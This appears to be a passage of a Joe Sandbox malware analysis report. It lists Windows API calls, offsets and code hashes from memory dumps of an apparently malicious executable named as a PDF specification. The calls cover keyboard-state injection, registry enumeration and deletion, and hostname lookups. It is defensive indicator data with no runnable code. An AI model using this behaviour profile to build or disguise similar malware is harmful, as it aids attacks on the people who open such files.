                                      • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                      • String ID:
                                      • API String ID: 3356174886-0
                                      • Opcode ID: ae9dd47c9639facc13fbf931b3f62f151290bd194072636fe0aa1c6efb8bbc12
                                      • Instruction ID: c01eec2ebe2ba0c71bd9039dc9187c5fb1d71350d0a1cea9bbcf3af9e8da6964
                                      • Opcode Fuzzy Hash: ae9dd47c9639facc13fbf931b3f62f151290bd194072636fe0aa1c6efb8bbc12
                                      • Instruction Fuzzy Hash: 40A1AE35600616EFDB1ACF68C9897EEBBB5BF04704F058125EE58AB690D734AD60CB90
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 55cc2250cbd13761c55aa1a1bfcde17e7f782a4c020552638347ae47696871de
                                      • Instruction ID: 671e163fdfae88fdca0bf13dcea2d25f5dc2676f407ef60f8452ce6ccdb4c3cb
                                      • Opcode Fuzzy Hash: 55cc2250cbd13761c55aa1a1bfcde17e7f782a4c020552638347ae47696871de
                                      • Instruction Fuzzy Hash: F0717C70900509EFCB06CF98CC49EEEBB78FF85315F148259F915AB261C330AA15DB61
                                      APIs
                                      • GetParent.USER32(?), ref: 00383DE7
                                      • GetKeyboardState.USER32(?), ref: 00383DFC
                                      • SetKeyboardState.USER32(?), ref: 00383E5D
                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00383E8B
                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00383EAA
                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00383EF0
                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00383F13
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      • Opcode ID: 47fd8f833a1a67be70eb87bcb22ebb1e21f8c20bdf188542e632591ac82e42d9
                                      • Instruction ID: 8483933eeb60e07cead857a79932aa283c8e298151f4f2f26c4bf91d54d34fc4
                                      • Opcode Fuzzy Hash: 47fd8f833a1a67be70eb87bcb22ebb1e21f8c20bdf188542e632591ac82e42d9
                                      • Instruction Fuzzy Hash: 8E51F4A1A047D53EFB3763348C45BBA7EA95B06B04F0944C8F1D58A9C2D3E8AEC8D750
                                      APIs
                                      • GetParent.USER32(00000000), ref: 00383C02
                                      • GetKeyboardState.USER32(?), ref: 00383C17
                                      • SetKeyboardState.USER32(?), ref: 00383C78
                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00383CA4
                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00383CC1
                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00383D05
                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00383D26
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      • Opcode ID: 01c66fbb498d5497f832225bdb6ed5e8a29cf276e6ef2cd95ca871487bfcba3b
                                      • Instruction ID: 9c0e800cc63808eb2ec60b98ce259b3c2d92f8e43fab9d7b3d86911d72da8206
                                      • Opcode Fuzzy Hash: 01c66fbb498d5497f832225bdb6ed5e8a29cf276e6ef2cd95ca871487bfcba3b
                                      • Instruction Fuzzy Hash: 315107A05047D53DFB33A7748C55BB6BFA96B06B00F0884C8E0D55AAC2D294EE98E760
                                      APIs
                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 003A9B19
                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 003A9B2D
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 003A9B47
                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 003A9BB9
                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 003A9BE7
                                       Memory Dump Source
                                       • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window
                                      • String ID: SysListView32
                                      • API String ID: 2326795674-78025650
                                      • Opcode ID: 44c146abe3839e6b23257104522742517474a18e507ffa9e0ccc8d7ff41e799d
                                      • Instruction ID: 79ecea70f87bd235182e258294422b9bff3da515ebbab8c473e112738c4eacbe
                                      • Opcode Fuzzy Hash: 44c146abe3839e6b23257104522742517474a18e507ffa9e0ccc8d7ff41e799d
                                      • Instruction Fuzzy Hash: FD41AF71940308AFDB229FA4DC85FEE77A8EF09350F11452AF689EB291D7719D84CB60
                                      APIs
                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 003A3DA1
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003A3DCB
                                      • FreeLibrary.KERNEL32(00000000), ref: 003A3E80
                                        • Part of subcall function 003A3D72: RegCloseKey.ADVAPI32(?), ref: 003A3DE8
                                        • Part of subcall function 003A3D72: FreeLibrary.KERNEL32(?), ref: 003A3E3A
                                        • Part of subcall function 003A3D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 003A3E5D
                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 003A3E25
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                      • String ID:
                                      • API String ID: 395352322-0
                                      • Opcode ID: 48fb64b555d15c7bbe689d2772705a40b1e5b365c8174e5102f8d96c3df7efd6
                                      • Instruction ID: ec0284f80e3e3f3d6f05062f3ac9edbffd21b54680185d49b59224e41c6ee1e7
                                      • Opcode Fuzzy Hash: 48fb64b555d15c7bbe689d2772705a40b1e5b365c8174e5102f8d96c3df7efd6
                                      • Instruction Fuzzy Hash: B531CAB2901119BFDB169B94DC89EFFB7BCEF09300F00016AF512E6150D674AF499BA0
                                      APIs
                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 003A8FE7
                                      • GetWindowLongW.USER32(00F22290,000000F0), ref: 003A901A
                                      • GetWindowLongW.USER32(00F22290,000000F0), ref: 003A904F
                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 003A9081
                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003A90AB
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 003A90BC
                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003A90D6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: LongWindow$MessageSend
                                      • String ID:
                                      • API String ID: 2178440468-0
                                      • Opcode ID: 1ad704f65dfc0fd2862421752863391b9ba608108ae3ac9a571d5e30594790a5
                                      • Instruction ID: 74ec546bb8dfb378f72dd6d11d2421d7edb6d7747738e28431fafc3f25e7d7c8
                                      • Opcode Fuzzy Hash: 1ad704f65dfc0fd2862421752863391b9ba608108ae3ac9a571d5e30594790a5
                                      • Instruction Fuzzy Hash: C2313334600215AFDB22CF58DC84F6437A9FB4A354F1641A6F619EF2B1CBB2A840CB44
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003808F2
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00380918
                                      • SysAllocString.OLEAUT32(00000000), ref: 0038091B
                                      • SysAllocString.OLEAUT32(?), ref: 00380939
                                      • SysFreeString.OLEAUT32(?), ref: 00380942
                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00380967
                                      • SysAllocString.OLEAUT32(?), ref: 00380975
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                      • String ID:
                                      • API String ID: 3761583154-0
                                      • Opcode ID: 2645a68ecc0b7f6ae815d86f1b0372fbaee6d8b81705a6f4410d1e7fc20df4b4
                                      • Instruction ID: 5e31ac59403317fd1724fdf8aaeb92f63097e7d5354718ded1092a0e3d099f03
                                      • Opcode Fuzzy Hash: 2645a68ecc0b7f6ae815d86f1b0372fbaee6d8b81705a6f4410d1e7fc20df4b4
                                      • Instruction Fuzzy Hash: 7921B572600308AFAB55AF78CC88DBB73ACEB09360B018125F915DB161DB70EC498B60
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003809CB
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003809F1
                                      • SysAllocString.OLEAUT32(00000000), ref: 003809F4
                                      • SysAllocString.OLEAUT32 ref: 00380A15
                                      • SysFreeString.OLEAUT32 ref: 00380A1E
                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00380A38
                                      • SysAllocString.OLEAUT32(?), ref: 00380A46
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                      • String ID:
                                      • API String ID: 3761583154-0
                                      • Opcode ID: dd6bb2677daf0c4012864acd1d05b2f13c06735d35795dd95d1301a101af7fb9
                                      • Instruction ID: 3de683c60a456186b89d54f003def0422b4af80ab8b7660780594e2cdd172fc4
                                      • Opcode Fuzzy Hash: dd6bb2677daf0c4012864acd1d05b2f13c06735d35795dd95d1301a101af7fb9
                                      • Instruction Fuzzy Hash: B1216275200304AFDB59ABA9DC88DBA77ECEF09360B018165F909CB261EA74ED858764
                                      APIs
                                        • Part of subcall function 0035D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0035D1BA
                                        • Part of subcall function 0035D17C: GetStockObject.GDI32(00000011), ref: 0035D1CE
                                        • Part of subcall function 0035D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0035D1D8
                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 003AA32D
                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 003AA33A
                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 003AA345
                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 003AA354
                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 003AA360
                                       Memory Dump Source
                                       • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend$CreateObjectStockWindow
                                      • String ID: Msctls_Progress32
                                      • API String ID: 1025951953-3636473452
                                      • Opcode ID: 0d3f39070210d180d0400dbd124da9e9a9860d0e1b46afc409e28e775fe1e440
                                      • Instruction ID: e5b4797baa9494d1b78597f5ff9a0ba5d71ecba70bb723ec2cead58b9d1df288
                                      • Opcode Fuzzy Hash: 0d3f39070210d180d0400dbd124da9e9a9860d0e1b46afc409e28e775fe1e440
                                      • Instruction Fuzzy Hash: 031160B6150219BEEF169F64CC85EEB7F6DFF09798F014115FA08A60A0C7729C21DBA4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CleanupStartupgethostbynamegethostnameinet_ntoa
                                      • String ID: 0.0.0.0
                                      • API String ID: 348263315-3771769585
                                      • Opcode ID: fff97d31509829bb31898ee1b8150a3425cd59827a7a5caafccdf34e5d1c7321
                                      • Instruction ID: cca27b9601a1d8cab78c640ee30c370fb2765821a42d9c2000c0e013e9314405
                                      • Opcode Fuzzy Hash: fff97d31509829bb31898ee1b8150a3425cd59827a7a5caafccdf34e5d1c7321
                                      • Instruction Fuzzy Hash: 3E11B472904215AFCB27BB60AC4BEEA77ACEF41710F0141B5F645EA091EF70EA858B50
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00386B63
                                      • LoadStringW.USER32(00000000), ref: 00386B6A
                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00386B80
                                      • LoadStringW.USER32(00000000), ref: 00386B87
                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00386BCB
                                      Strings
                                      • %s (%d) : ==> %s: %s %s, xrefs: 00386BA8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: HandleLoadModuleString$Message
                                      • String ID: %s (%d) : ==> %s: %s %s
                                      • API String ID: 4072794657-3128320259
                                      • Opcode ID: 85f9dae37007ab0ea2d3a9b4fd683efa84bb345fb9077a8f90f6df0e84c20e8f
                                      • Instruction ID: fc4b96c33edffe49735f3634cd8fbe2fbd820d49f491060196b8023f3faa00c1
                                      • Opcode Fuzzy Hash: 85f9dae37007ab0ea2d3a9b4fd683efa84bb345fb9077a8f90f6df0e84c20e8f
                                      • Instruction Fuzzy Hash: 650136F65002087FE753A7949D89EF7776CD704304F0444A5B745D6041EA74AE858F75
                                      APIs
                                      • GetClientRect.USER32(?,?), ref: 0035CCF6
                                      • GetWindowRect.USER32(?,?), ref: 0035CD37
                                      • ScreenToClient.USER32(?,?), ref: 0035CD5F
                                      • GetClientRect.USER32(?,?), ref: 0035CE8C
                                      • GetWindowRect.USER32(?,?), ref: 0035CEA5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Rect$Client$Window$Screen
                                      • String ID:
                                      • API String ID: 1296646539-0
                                      • Opcode ID: e32feb8c94a2149dcf58f695c7eb3bca15233184dddaa25899392d80e69f06f8
                                      • Instruction ID: eeea36300c7ed387f8c354a54ec6f7f57c481cd4ac9368f77070e25156cbdd80
                                      • Opcode Fuzzy Hash: e32feb8c94a2149dcf58f695c7eb3bca15233184dddaa25899392d80e69f06f8
                                      • Instruction Fuzzy Hash: DCB17979910249DFCB11CFA8C480BEDBBB5FF08309F15A129ED59EB620DB30A954CB64
                                      APIs
                                        • Part of subcall function 00367CF4: EnterCriticalSection.KERNEL32(00000000,?,00367ADD,0000000D), ref: 00367D1F
                                        • Part of subcall function 00366986: Sleep.KERNEL32(00000000,000003BC,0035F507,?,0000000E), ref: 003669AC
                                      • GetStartupInfoW.KERNEL32(?,003F6E28,00000064,00365E91,003F6C70,00000014), ref: 0036AD46
                                      • GetFileType.KERNEL32(00000001), ref: 0036ADD8
                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0036AE11
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CriticalSection$CountEnterFileInfoInitializeSleepSpinStartupType
                                      • String ID:
                                      • API String ID: 1184225303-0
                                      • Opcode ID: 08fbb81b73af87e912f46505994bb3959535b66de74c1a784bb4484665d63709
                                      • Instruction ID: 60e966e60c3507fc752cf85fe975ad7c0dab8693eb2919f8498db8d830f7bfeb
                                      • Opcode Fuzzy Hash: 08fbb81b73af87e912f46505994bb3959535b66de74c1a784bb4484665d63709
                                      • Instruction Fuzzy Hash: 4881E2B0905B458FDB16CF68C9805A9BBF4AF06324B24826DE4A6BB3D5C7359803CF56
                                      APIs
                                        • Part of subcall function 003A3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003A2BB5,?,?), ref: 003A3C1D
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003A30AF
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003A30EF
                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 003A3112
                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 003A313B
                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 003A317E
                                      • RegCloseKey.ADVAPI32(00000000), ref: 003A318B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                      • String ID:
                                      • API String ID: 3451389628-0
                                      • Opcode ID: cfacd1329dc53c79b984d20cba1638ac87e739044611fa6ecf8d270f90ef7931
                                      • Instruction ID: b8b19ee7102746945c59f22ad8a04b3bed8dee1a7a2e49b5316bd1e006c3fec7
                                      • Opcode Fuzzy Hash: cfacd1329dc53c79b984d20cba1638ac87e739044611fa6ecf8d270f90ef7931
                                      • Instruction Fuzzy Hash: AE513831218300AFC706EF64CC85E6ABBE9FF89304F04496DF5559B2A1DB71EA05CB52
                                      APIs
                                        • Part of subcall function 0036F82F: SetFilePointerEx.KERNEL32(00000000,00000002,?,?,?,00000000,?,?,?,?,0036B11C,?,00000000,00000000,00000002,?), ref: 0036F866
                                        • Part of subcall function 0036F82F: GetLastError.KERNEL32(?,0036B11C,?,00000000,00000000,00000002,?,?,?,?,0036AFE4,?,00000002,?,003F6E48,00000010), ref: 0036F870
                                      • GetProcessHeap.KERNEL32(00000008,00001000,?,?,?,?,?,003EEEF4,00000001,00000000,?,?,00376071,003EEEF4,0000000C,00000080), ref: 00376FA9
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,003EEEF4,00000001,00000000,?,?,00376071,003EEEF4,0000000C,00000080), ref: 00376FB0
                                      • GetProcessHeap.KERNEL32(00000000,003EEEF4,?,?,?,?,?,?,?,?,003EEEF4,00000001,00000000,?,?,00376071), ref: 00377050
                                      • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,003EEEF4,00000001,00000000,?,?,00376071,003EEEF4), ref: 00377057
                                      • SetEndOfFile.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,003EEEF4,00000001,00000000,?,?,00376071), ref: 0037708D
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,003EEEF4,00000001,00000000,?,?,00376071,003EEEF4), ref: 003770BD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Heap$ErrorFileLastProcess$AllocFreePointer
                                      • String ID:
                                      • API String ID: 1354853467-0
                                      • Opcode ID: f8c21078086291e086db170626a7ee9a915ce5d6c0695fbf8f82aa12101ed043
                                      • Instruction ID: eee77123e764432e7669a82933ef121919236b3207406f4cff438d701889fb17
                                      • Opcode Fuzzy Hash: f8c21078086291e086db170626a7ee9a915ce5d6c0695fbf8f82aa12101ed043
                                      • Instruction Fuzzy Hash: 29411931A00510ABDB336BB89C46BAE7EB4EF05720F15C665F428EB2D1D73C994187A1
                                      APIs
                                      • GetMenu.USER32(?), ref: 003A8540
                                      • GetMenuItemCount.USER32(00000000), ref: 003A8577
                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 003A859F
